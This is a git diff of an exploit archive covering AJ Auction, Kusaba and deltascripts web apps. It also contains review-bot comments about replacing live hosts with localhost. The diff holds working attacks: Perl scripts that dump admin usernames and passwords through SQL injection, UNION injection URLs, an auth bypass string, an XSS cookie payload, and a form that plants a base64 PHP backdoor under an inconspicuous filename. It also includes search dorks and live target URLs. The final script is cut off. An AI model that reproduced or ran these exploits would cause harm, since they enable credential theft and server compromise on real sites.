-#Getting -while($answer = <$socket>) { -if ($answer =~ /Categories Within turkey:(.*?)turkeypass/){ -print "+ Exploit succeed! 
Getting admin information.\n"; -print "+ ---------------- +\n"; -print "+ Username: $1\n"; -} - -if ($answer =~ /turkeypass:(.*?)<\/b><\/font> <\/td><\/tr>/){ -print "+ Password: $1\n"; -} - -if ($answer =~ /Syntax error/) { -print "+ Exploit Failed : ( \n"; -print "+**********************************************************************+\n"; -exit(); -} - -if ($answer =~ /Internal Server Error/) { -print "+ Exploit Failed : ( \n"; -print "+**********************************************************************+\n"; -exit(); -} - } - -# milw0rm.com [2007-03-04] +#!/usr/bin/perl +#[Script Name: AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit +#[Coded by : ajann +#[Author : ajann +#[Contact : :( +#[S.Page : http://www.ajsquare.com +#[Dork : "/subcat.php?cate_id=" +#[$$ : 250.00 USD +#[.. : ajann,Turkey + +use IO::Socket; +if(@ARGV < 1){ +print " +[======================================================================== +[// AJ Auction All Version (subcat.php) Remote BLIND SQL Injection Exploit +[// Usage: exploit.pl [target] +[// Example: exploit.pl victim.com +[// Example: exploit.pl victim.com +[// Vuln&Exp : ajann +[======================================================================== +"; +exit(); +} +#Local variables +$server = $ARGV[0]; +$server =~ s/(http:\/\/)//eg; +$host = "http://".$server; +$port = "80"; +$file = "/subcat.php?cate_id="; + +print "Script <DIR> : "; +$dir = <STDIN>; +chop ($dir); + +if ($dir =~ /exit/){ +print "-- Exploit Failed[You Are Exited] \n"; +exit(); +} + +if ($dir =~ /\//){} +else { +print "-- Exploit Failed[No DIR] \n"; +exit(); + } + + +$target = "-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list"; +$target = $host.$dir.$file.$target; + +#Writing data to socket +print "+**********************************************************************+\n"; +print "+ Trying to connect: $server\n"; +$socket = 
IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; +print $socket "GET $target HTTP/1.1\n"; +print $socket "Host: $server\n"; +print $socket "Accept: */*\n"; +print $socket "Connection: close\n\n"; +print "+ Connected!...\n"; +#Getting +while($answer = <$socket>) { +if ($answer =~ /Categories Within turkey:(.*?)turkeypass/){ +print "+ Exploit succeed! Getting admin information.\n"; +print "+ ---------------- +\n"; +print "+ Username: $1\n"; +} + +if ($answer =~ /turkeypass:(.*?)<\/b><\/font> <\/td><\/tr>/){ +print "+ Password: $1\n"; +} + +if ($answer =~ /Syntax error/) { +print "+ Exploit Failed : ( \n"; +print "+**********************************************************************+\n"; +exit(); +} + +if ($answer =~ /Internal Server Error/) { +print "+ Exploit Failed : ( \n"; +print "+**********************************************************************+\n"; +exit(); +} + } + +# milw0rm.com [2007-03-04] diff --git a/platforms/php/webapps/5591.txt b/platforms/php/webapps/5591.txt index 0c9094f68..b88c55964 100755 --- a/platforms/php/webapps/5591.txt +++ b/platforms/php/webapps/5591.txt 
@@ -1,49 +1,49 @@ ---==+================================================================================+==-- ---==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==-- ---==+================================================================================+==-- - - - -Discovered By: t0pP8uZz -Discovered On: 12 MAY 2008 -Script Download: http://www.ajsquare.com/products/auction/index.php?auc=1 -DORK: inurl:"classifide_ad.php" - - - -Vendor Has Not Been Notified! - - - -DESCRIPTION: - -AJ Auction (all versions to date) suffers from a insecure mysql query, allowing a remote attacker, -to arbitrary inject mysql code/query. - -the below injection will display the admin credentials. - - - -SQL Injection's: - -http://site.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/* - - - -NOTE/TIP: - -admin login is at /admin/ - - - -GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! - - -peace, t0pP8uZz - - ---==+================================================================================+==-- ---==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==-- ---==+================================================================================+==-- - -# milw0rm.com [2008-05-12] +--==+================================================================================+==-- +--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==-- +--==+================================================================================+==-- + + + +Discovered By: t0pP8uZz +Discovered On: 12 MAY 2008 +Script Download: http://www.ajsquare.com/products/auction/index.php?auc=1 +DORK: inurl:"classifide_ad.php" + + + +Vendor Has Not Been Notified! 
+ + + +DESCRIPTION: + +AJ Auction (all versions to date) suffers from a insecure mysql query, allowing a remote attacker, +to arbitrary inject mysql code/query. + +the below injection will display the admin credentials. + + + +SQL Injection's: + +http://site.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/* + + + +NOTE/TIP: + +admin login is at /admin/ + + + +GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! + + +peace, t0pP8uZz + + +--==+================================================================================+==-- +--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==-- +--==+================================================================================+==-- + +# milw0rm.com [2008-05-12] diff --git a/platforms/php/webapps/5867.txt b/platforms/php/webapps/5867.txt index 84b2704df..29f73a945 100755 --- a/platforms/php/webapps/5867.txt +++ b/platforms/php/webapps/5867.txt 
@@ -1,40 +1,40 @@ -######################################################### -# -# Auction Web 2.0 SQL Injection Vulnerability -#======================================================== -# Author: Hussin X = -# = -# Home : www.tryag.cc/cc = -# = -# email: darkangel_g85[at]Yahoo[DoT]com = -# hussin.x[at]hotmail[DoT]com = -# = -#========================================================= -# HomE script : http://www.ajauctionpro.com/ajhome.php -# -# Demo : http://www.ajauctionpro.com/auction_web2.0/ -# -# DorK : Powered By AJ Auction Web -# DorK : Powered By Auction Web -# -########################################################## - -Exploit: - -http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin-- - - -Admin login - -admin/index.php - -################################################################################ -#####################################( Greetz )################################# -# # -# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA # -# mos_chori / Rafi / FAHD / Iraq Hackers / # -# # -#################################(and All IRAQIs)############################### -################################################################################ - -# milw0rm.com [2008-06-19] +######################################################### +# +# Auction Web 2.0 SQL Injection Vulnerability +#======================================================== +# Author: Hussin X = +# = +# Home : www.tryag.cc/cc = +# = +# email: darkangel_g85[at]Yahoo[DoT]com = +# hussin.x[at]hotmail[DoT]com = +# = +#========================================================= +# HomE script : http://www.ajauctionpro.com/ajhome.php +# +# Demo : http://www.ajauctionpro.com/auction_web2.0/ +# +# DorK : Powered By AJ Auction Web +# DorK : Powered By Auction Web +# +########################################################## + +Exploit: + 
+http://localhost.com/[PaTs]/category.php?cate_id=-1+union+select+1,concat(user_name,0x3a,password),3,4+from+admin-- + + +Admin login + +admin/index.php + +################################################################################ +#####################################( Greetz )################################# +# # +# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA # +# mos_chori / Rafi / FAHD / Iraq Hackers / # +# # +#################################(and All IRAQIs)############################### +################################################################################ + +# milw0rm.com [2008-06-19] diff --git a/platforms/php/webapps/6550.txt b/platforms/php/webapps/6550.txt index 2f45e8340..861ab31b4 100755 --- a/platforms/php/webapps/6550.txt +++ b/platforms/php/webapps/6550.txt 
@@ -1,14 +1,14 @@ -############################################################################################ -## AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability -## POC : -## /detail.php?item_id=-1+UNION+SELECT+1,2,3,4,concat(user_name,0x3a,password), -## 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 -## ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+admin-- -## Live Demo : -## http://www.ajauctionpro.com/ajauction_platinum2/detail.php?item_id=-1+UNION+SELECT+1,2,3,4 -## ,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 -## ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 -## ,43,44,45,46,47,48,49,50,51+from+admin-- -############################################################################################ - -# milw0rm.com [2008-09-24] +############################################################################################ +## AJ Auction Pro Platinum Skin #2 (detail.php item_id) Remote SQL Injection Vulnerability +## POC : +## /detail.php?item_id=-1+UNION+SELECT+1,2,3,4,concat(user_name,0x3a,password), +## 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 +## ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+from+admin-- +## Live Demo : +## http://www.ajauctionpro.com/ajauction_platinum2/detail.php?item_id=-1+UNION+SELECT+1,2,3,4 +## ,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 +## ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 +## ,43,44,45,46,47,48,49,50,51+from+admin-- +############################################################################################ + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6561.txt b/platforms/php/webapps/6561.txt index 51cef4f5b..b42621a8e 100755 --- a/platforms/php/webapps/6561.txt +++ b/platforms/php/webapps/6561.txt 
@@ -1,34 +1,34 @@ -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| -| _ __ __ __ ______ | -| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | -| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | -| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | -| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | -| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | -| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | -| \ \____/ >> Kings of injection | -| \/___/ | -|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| - - Xss /Remote SQL injection - -Script : Aj auction platinum2 , last version -Site : http://www.ajauctionpro.com -Dork : Powered By AJ Auction -Demo : http://www.ajauctionpro.com/ajauction_platinum2/ -[ SQL injection ] -========================================================================= -EXP file: Script path /sellers_othersitem.php?seller_id= - -SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin-- - -[Xss] -========================================================================= -EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script> -========================================================================= -ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers - - -thanx str0ke/* - -# milw0rm.com [2008-09-25] +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| +| _ __ __ __ ______ | +| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ | +| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ | +| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ | +| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ | +| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ | +| \/_/\/_/\/_/\ \_\ 
\/___/ \/____/ \/__/ \/___/ \/_/ \/___/ | +| \ \____/ >> Kings of injection | +| \/___/ | +|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| + + Xss /Remote SQL injection + +Script : Aj auction platinum2 , last version +Site : http://www.ajauctionpro.com +Dork : Powered By AJ Auction +Demo : http://www.ajauctionpro.com/ajauction_platinum2/ +[ SQL injection ] +========================================================================= +EXP file: Script path /sellers_othersitem.php?seller_id= + +SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin-- + +[Xss] +========================================================================= +EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script> +========================================================================= +ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers + + +thanx str0ke/* + +# milw0rm.com [2008-09-25] diff --git a/platforms/php/webapps/6711.htm b/platforms/php/webapps/6711.htm index 4e165eb1f..9bd2f0f28 100755 --- a/platforms/php/webapps/6711.htm +++ b/platforms/php/webapps/6711.htm 
@@ -1,28 +1,28 @@ -<!-- -9 Oct 2008 -Kusaba <= 1.0.4 Remote Code Execution Exploit #2 -Sausage <tehsausage@gmail.com> - -Will work if they have left the load_receiver.php script un-edited. - -After execution: (Yes these are the exact URLs) -http://www.kusaba.image.board/url/change this to the same value as your -KU_ROOTDIRpost.php?pc=print "Hello"; -http://www.kusaba.image.board/url/change this to the same value as your -KU_ROOTDIRpost.php?sc=echo Hello ---> -<pre> -<form action="./load_receiver.php" method="POST"> -<input type="text" name="password" value="changeme"> <!-- Don't actually -change this, unless they have changed their password and you know it --> -<input type="text" name="type" value="direct"> -<input type="text" name="file" -value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw=="> -<!-- same backdoor from the paint_save.php exploit --> -<input type="text" name="targetname" value="post.php"> <!-- Any -inconspicuous filename will do --> - -<input type="submit" value="Exploit"> -</form> - -# milw0rm.com [2008-10-09] +<!-- +9 Oct 2008 +Kusaba <= 1.0.4 Remote Code Execution Exploit #2 +Sausage <tehsausage@gmail.com> + +Will work if they have left the load_receiver.php script un-edited. 
+ +After execution: (Yes these are the exact URLs) +http://www.kusaba.image.board/url/change this to the same value as your +KU_ROOTDIRpost.php?pc=print "Hello"; +http://www.kusaba.image.board/url/change this to the same value as your +KU_ROOTDIRpost.php?sc=echo Hello +--> +<pre> +<form action="./load_receiver.php" method="POST"> +<input type="text" name="password" value="changeme"> <!-- Don't actually +change this, unless they have changed their password and you know it --> +<input type="text" name="type" value="direct"> +<input type="text" name="file" +value="PD9waHAgaXNzZXQoJF9HRVRbJ3BjJ10pPyhldmFsKHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3BjJ10pKSkpOihpc3NldCgkX0dFVFsnc2MnXSk/KHBhc3N0aHJ1KHVybGRlY29kZShzdHJpcHNsYXNoZXMoJF9HRVRbJ3NjJ10pKSkpOihoZWFkZXIoJ0xvY2F0aW9uOiAuLi8nKSkpOw=="> +<!-- same backdoor from the paint_save.php exploit --> +<input type="text" name="targetname" value="post.php"> <!-- Any +inconspicuous filename will do --> + +<input type="submit" value="Exploit"> +</form> + +# milw0rm.com [2008-10-09] diff --git a/platforms/php/webapps/7023.txt b/platforms/php/webapps/7023.txt index 5255f191d..a7c0e6513 100755 --- a/platforms/php/webapps/7023.txt +++ b/platforms/php/webapps/7023.txt 
@@ -1,58 +1,58 @@ -[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 06.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -username: [real_admin_name] ' or ' 1=1 - -password: ZoRLu - -note: generally admin name: admin - - - -admin login for demo: - -http://demo.deltascripts.com/classifieds/admin/login.php - - -example for demo: - -admin: admin ' or ' 1=1 - -passwd: ZoRLu - - - -example 2: - -admin login: - -http://www.maramuresul-istoric.ro/anunturi/admin/login.php - - - -admin: admin ' or ' 1=1 - -passwd: ZoRLu - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-06] +[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 06.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +username: [real_admin_name] ' or ' 1=1 + +password: ZoRLu + +note: generally admin name: admin + + + +admin login for demo: + +http://localhost/classifieds/admin/login.php + + +example for demo: + +admin: admin ' or ' 1=1 + +passwd: ZoRLu + + + +example 2: + +admin login: + +http://localhost/anunturi/admin/login.php + + + +admin: admin ' or ' 1=1 + +passwd: ZoRLu + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim 
HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-06] diff --git a/platforms/php/webapps/7024.txt b/platforms/php/webapps/7024.txt index 88d14f24f..92d5561a7 100755 --- a/platforms/php/webapps/7024.txt +++ b/platforms/php/webapps/7024.txt @@ -1,4 +1,4 @@ -[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability +[~] deltascripts phplinks Remote Auth Bypass Vulnerability [~] [~] ---------------------------------------------------------- [~] Discovered By: ZoRLu @@ -25,7 +25,7 @@ note: generally admin name: admin admin login for demo: -http://demo.deltascripts.com/classifieds/admin/login.php +http://localhost/classifieds/admin/login.php example for demo: @@ -40,7 +40,7 @@ example 2: admin login: -http://www.maramuresul-istoric.ro/anunturi/admin/login.php +http://localhost/anunturi/admin/login.php diff --git a/platforms/php/webapps/7087.txt b/platforms/php/webapps/7087.txt index 1bb4bc2fc..42ec3d60c 100755 --- a/platforms/php/webapps/7087.txt +++ b/platforms/php/webapps/7087.txt 
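Review bot: The redaction in this hunk swaps `demo.deltascripts.com` and `www.maramuresul-istoric.ro` for `localhost`, but the same commit leaves equivalent live hosts on the new side of other files: 7087.txt still lists `http://www.tapinglobal.com/admin/` under LIVE, and 6550.txt, 6561.txt and 7836.txt keep their `www.ajauctionpro.com` demo URLs. If the goal is to stop the archive pointing at real installations, those entries need the same treatment; `www.ajauctionpro.com` may be a vendor demo rather than a third party, so that distinction is worth recording explicitly in the commit message. The whole file is also shown as removed and re-added with otherwise identical text, which looks like a line-ending change mixed into the content edit and makes the two URL substitutions hard to spot in review.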
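Review bot: The retitle to `phplinks` in the first 7024.txt hunk is not carried through to the demo path two hunks later, which still reads `http://localhost/classifieds/admin/login.php`; if the product really is phplinks, the `classifieds` segment looks inherited from 7023.txt and should be checked against the original advisory rather than kept by copy. Nothing else on this page shows which product 7024 documents, so I cannot confirm the new title from here. The second and third hunks otherwise mirror the 7023.txt redaction and carry the same question about the remaining live hosts elsewhere in the commit.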
@@ -1,79 +1,79 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - AJ Auction Auth Bypass Vulnerability -============================================================================== - - [»] Script: [ AJ Auction ] - [»] Language: [ PHP ] - [»] Website: [ http://www.ajsquare.com/products/auction/ ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 10.11.2008 ] - [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] - - - [-] AJ Auction OOPD - [+] AJ Auction Pro Platinum Skin #1 - [+] AJ Auction Pro Platinum Skin #2 - [+] AJ Auction Web 2.0 - -===[ XPL ]=== - - [!] When the page gets load, Press ESC btn To Bypass Redirection ;) - - [ Only AJ Auction Pro Platinum Skin #1 ] - [»] http://localhost/[path]/admin/user.php - - [ all ] - [»] http://localhost/[path]/admin/site.php - [»] http://localhost/[path]/admin/auction.php - [»] http://localhost/[path]/admin/mail.php - [»] http://localhost/[path]/admin/fee_setting.php - [»] http://localhost/[path]/admin/earnings.php - [»] http://localhost/[path]/admin/insertion_fee_settings.php - [»] http://localhost/[path]/admin/custom_category.php - [»] http://localhost/[path]/admin/subcategory.php - [»] http://localhost/[path]/admin/category.php - [»] http://localhost/[path]/admin/report.php - [»] http://localhost/[path]/amdin/store_manager.php - [»] http://localhost/[path]/admin/choose_sell_format.php - [»] ... - - - -===[ LIVE ]=== - [!] 
Skin #1 - [»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php - [»] http://www.tapinglobal.com/admin/ - - [!] Web2.0 - [»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 <Tornado2800[at]gmail.com> - [»] Hussain-X <darkangel_g85[at]yahoo.com> - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... - -=============================================================================== -exit(); -=============================================================================== - -# milw0rm.com [2008-11-10] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . \ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + AJ Auction Auth Bypass Vulnerability +============================================================================== + + [»] Script: [ AJ Auction ] + [»] Language: [ PHP ] + [»] Website: [ http://www.ajsquare.com/products/auction/ ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 10.11.2008 ] + [»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] + + + [-] AJ Auction OOPD + [+] AJ Auction Pro Platinum Skin #1 + [+] AJ Auction Pro Platinum Skin #2 + [+] AJ Auction Web 2.0 + +===[ XPL ]=== + + [!] 
When the page gets load, Press ESC btn To Bypass Redirection ;) + + [ Only AJ Auction Pro Platinum Skin #1 ] + [»] http://localhost/[path]/admin/user.php + + [ all ] + [»] http://localhost/[path]/admin/site.php + [»] http://localhost/[path]/admin/auction.php + [»] http://localhost/[path]/admin/mail.php + [»] http://localhost/[path]/admin/fee_setting.php + [»] http://localhost/[path]/admin/earnings.php + [»] http://localhost/[path]/admin/insertion_fee_settings.php + [»] http://localhost/[path]/admin/custom_category.php + [»] http://localhost/[path]/admin/subcategory.php + [»] http://localhost/[path]/admin/category.php + [»] http://localhost/[path]/admin/report.php + [»] http://localhost/[path]/amdin/store_manager.php + [»] http://localhost/[path]/admin/choose_sell_format.php + [»] ... + + + +===[ LIVE ]=== + [!] Skin #1 + [»] http://www.ajauctionpro.com/ajauction_platinum/admin/index.php + [»] http://www.tapinglobal.com/admin/ + + [!] Web2.0 + [»] http://www.ajauctionpro.com/auction_web2.0/admin/index.php + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 <Tornado2800[at]gmail.com> + [»] Hussain-X <darkangel_g85[at]yahoo.com> + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... + +=============================================================================== +exit(); +=============================================================================== + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7836.txt b/platforms/php/webapps/7836.txt index e27d78cf8..6589568da 100755 --- a/platforms/php/webapps/7836.txt +++ b/platforms/php/webapps/7836.txt 
@@ -1,32 +1,32 @@ -================================================================================================================== -= SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM = -= S N N N A A K K E S T E A A M M M M = -+ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M + -= S N N N A A K K E S T E A A M M M = -= SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M = -===================================================SNAKES TEAM==================================================== -+ = -= AJAuctionPro OOPD v2.3 SQL Injection Vulnerability + -+ = -==============================================:::ALGERIAN HaCkEr:::=============================================== - = = = = - = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = - = = - = :::::Mail: snakespc@gmail.com::::::: = - = = = - = http://www.ajsquare.com/products/auction/demo.php "index.php" = - =====================================GAZA============================================= - -Exploit: -http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users-- -******** -demo: -http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users-- -============================================================== ALLAH AKBAR========================================================= - -Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: -ALL www.Snakespc.com/sc >>>> Members -Str0ke ....Milw0rm -==================================================================GAZA============================================================ - -# milw0rm.com [2009-01-20] +================================================================================================================== += SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM = += S N N N A A K K E S T E A A M M M M = ++ SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M 
M + += S N N N A A K K E S T E A A M M M = += SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M = +===================================================SNAKES TEAM==================================================== ++ = += AJAuctionPro OOPD v2.3 SQL Injection Vulnerability + ++ = +==============================================:::ALGERIAN HaCkEr:::=============================================== + = = = = + = = Discovered By: Snakespc :::ALGERIAN HaCkEr::: = = + = = + = :::::Mail: snakespc@gmail.com::::::: = + = = = + = http://www.ajsquare.com/products/auction/demo.php "index.php" = + =====================================GAZA============================================= + +Exploit: +http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users-- +******** +demo: +http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users-- +============================================================== ALLAH AKBAR========================================================= + +Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: +ALL www.Snakespc.com/sc >>>> Members +Str0ke ....Milw0rm +==================================================================GAZA============================================================ + +# milw0rm.com [2009-01-20] diff --git a/platforms/php/webapps/9447.pl b/platforms/php/webapps/9447.pl index 8e33155cc..efbe8a5a5 100755 --- a/platforms/php/webapps/9447.pl +++ b/platforms/php/webapps/9447.pl 
@@ -1,53 +1,53 @@ -#!/usr/bin/perl - -#********************************************************# -# # -# [o] AJ Auction Pro OOPD 2.x SQL Injection Exploit # -# Software : AJ Auction Pro OOPD 2.x # -# Vendor : http://www.ajsquare.com/ # -# Author : NoGe # -# Contact : noge[dot]code[at]gmail[dot]com # -# Blog : http://evilc0de.blogspot.com # -# # -# [o] Usage # -# root@noge:~# perl ajpro.pl www.target.com # -# # -# [o] Dork # -# "Powered By AJ Auction Pro" # -# # -# [o] Greetz # -# MainHack BrotherHood [ http://mainhack.net ] # -# Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang # -# H312Y yooogy mousekill }^-^{ loqsa zxvf martfella # -# skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke # -# # -#********************************************************# - -use HTTP::Request; -use LWP::UserAgent; - -my $target = $ARGV[0]; -my $file_vuln = '/store.php?id='; -my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--'; -print "\n[x]===============================================[x]\n"; -print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n"; -print "[x] [C]oded By NoGe [x]\n"; -print "[x]===============================================[x]\n\n"; - -my $exploit = "http://".$target.$file_vuln.$sql_query; - -my $request = HTTP::Request->new(GET=>$exploit); -my $useragent = LWP::UserAgent->new(); -$useragent->timeout(10); -my $response = $useragent->request($request); -if ($response->is_success) { -my $res = $response->content; -if ($res =~ m/:(.*):(.*):/g) { -my ($username,$password) = ($1,$2); -print "[+] $username:$password \n\n"; -} -else { print "[-] Error, Fail to get admin 